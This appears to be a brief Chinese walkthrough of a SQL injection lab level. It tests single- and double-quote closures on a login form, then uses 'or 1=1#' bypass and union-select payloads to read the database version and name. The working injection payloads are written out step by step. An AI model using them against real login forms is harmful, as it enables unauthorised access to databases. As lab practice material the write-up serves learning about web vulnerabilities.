知识点:
- 一般字符型注入分类
- 单引号闭合
- 双引号闭合
- 这是一个双引号闭合
看界面又是一个输入框的注入;通过admin admin进行登录发现页面还是有回显
直接使用万能密码尝试
构造payload:username=admin'or1=1
没有任何反应;可能是没加注释符的关闭
构造username=admin'or+1=1#
发现还是没有任何回显信息;第一反应是特殊字符过滤??;或许是单引号的问题
使用双引号试一下
构造payload:username=admin"or+1=1
发现有了报错信息;发现原始语句应该是where username=("输入内容") and passwd=
好好好;知道了原始语句就可以绕过了
构造payload:username=admin"+or+1=1#
页面成功打印出了用户信息
接下来尝试进行联合注入
构造payload:username=a"+union+select+1,2#
成功打印出了输入的信息
接下来获取对应数据库的版本信息和数据库名
构造payload:username=a"+union+select+version(),database()#
成功获取了数据库名和版本信息;
到这里就结束了;具体的敏感信息就不获取了,实际操作和第十一关一样
10